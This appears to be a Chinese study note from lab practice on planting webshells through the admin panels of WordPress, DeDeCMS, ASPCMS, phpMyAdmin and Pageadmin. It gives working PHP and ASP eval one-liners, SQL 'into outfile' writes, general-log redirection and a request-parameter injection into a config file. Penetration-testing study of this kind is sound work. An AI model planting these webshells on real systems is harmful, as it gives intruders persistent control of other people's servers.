常见的CMS漏洞
WordPress
1.后台修改模板拿WebShell
在wordpress的模板中我们可以通过修改模板中的404.php文件,在内容中添加一句话木马,保存后即可访问并拿到shell
添加后点击更新文件,然后访问ip/wp-content/themes/GeneratePress/404.php,即可直接连接
DeDeCMS
1.通过⽂件管理器上传WebShell
我们通过目录uploads/dede进入管理后台后,进入文件上传,这里可以直接上传一句话木马,我们创建一个2332.php文件,内容为<?php @eval($_POST['cmd']); ?>,然后将其上传
发现成功上传,那么我们直接去访问这个文件,然后用蚁剑连接
发现成功连接
2.修改模板⽂件拿WebShell
这一次,我们打开主页目录修改
将其中的index.htm修改,在其内容的第一行添加一个一句话木马后保存
进入更新主页html,将主页位置改为index.php,这里改为php后缀,就可以运行内容中的一句话木马了,然后点击更新主页html,点击浏览
这样我们就可以用主页的url直接到蚁剑中去连接
3.后台任意命令执⾏拿WebShell
进入模块中的广告管理,点击增加一个新广告,
在广告内容的代码中添加一句话木马,别的都随便填,然后点击确定
保存后就可以点击代码,直接去访问给的路径,就可以到蚁剑中去连接了
蚁剑也成功连接
4.sql命令直接上传获取webshell
打开系统中的sql命令执行工具,这里可以直接执行sql命令,那么我们就可以利用sql中的into outfile语句写一个一句话木马文件上去,语句如下
select "<?php @eval($_POST['cmd']); ?>" into outfile 'E:/phpstudy_pro/WWW/2233.php';
点击确定后发现成功上传
那么我们直接访问并连接
ASPCMS(asp)
1.后台修改配置⽂件拿Shell(这个网站搭建时要注意权限)
我们访问/admin_aspcms/index.asp登录进入后台后,在扩展功能中打开幻灯片管理,然后开启抓包后点击保存
在抓到的数据包中有一个slideTextStatus=1的字样,我们将1替换为1%25><%25Eval(Request (chr(65)))%25><%25,然后放包,即可在这个页面中获取webshell
上面我们添加的这个语句会影响/config/AspCms_Config.asp 文件,
在弹出修改成功后,我们直接用蚁剑去连接目录/config//AspCms_Config.asp (连接密码为a)
发现连接成功
PhpMyadmin
1.通过⽇志⽂件拿Shell 利⽤mysql⽇志⽂件写shell。
这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改 这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取⼀个webshell 。
首先登陆进去后点击sql
运行sq语句show global variables like '%general%';即可查看日志文件的开启状态,这里是off,代表着没开启,我们需要先将其开启
利用语句set global general_log='on';将其设为开启
然后利用'set global general_log_file = 'E:/phpstudy_pro/WWW/233.php'可以修改日志保存文件,我们这里将其保存为网站根目录下的233.php文件,然后再次去show global variables like '%general%'以确认我们的修改生效了,修改成功后,日志文件的后缀就被修改成了php,那么其中的php语句就会被运行
直接查询一个一句话木马select “<?php eval($_POST[’cmd’]);?>”;这样日志文件中就会有这个一句话木马的字样,我们去访问日志文件后,就可以进行连接获取shell
2.通过SQL语句拿webshell ⽤ into outfile 把后⻔写到⽹站⽬录上。
首先我们查询确定一下数据库的位置,利用语句 select @@basedir;查到数据库位置后,就可以大概猜测一下网站的根目录,一般www目录在phpstudt_pro下,是Extensions的同级目录
然后我们就可以利用into outfile语句给它网站根目录下写一句话木马了,构造语句如下
select "<?php @eval($_POST['cmd']); ?>" into outfile 'E:/phpstudy_pro/WWW/2233.php';
然后直接去访问这个文件,并用蚁剑连接
3.过滤 into outfile
如果过滤了第⼀种的图形化操作,那么我们可以用另一种方法,在变量中搜索gen
这里可以直接修改日志的启用状态和后缀,修改后,剩下的步骤就与1中一样了
Pageadmin(asp与sqlserver)
靶场中,我们可以在工具里面的文件管理中上传文件
首先我们需要写一个一句话木马,用asp语言,我这里选择直接用哥斯拉生成
将其1.asp压缩后上传,就可以在文件中看到我们上传的文件了
点击解压即可将其解压出来,然后访问,并用蚁剑成功连接
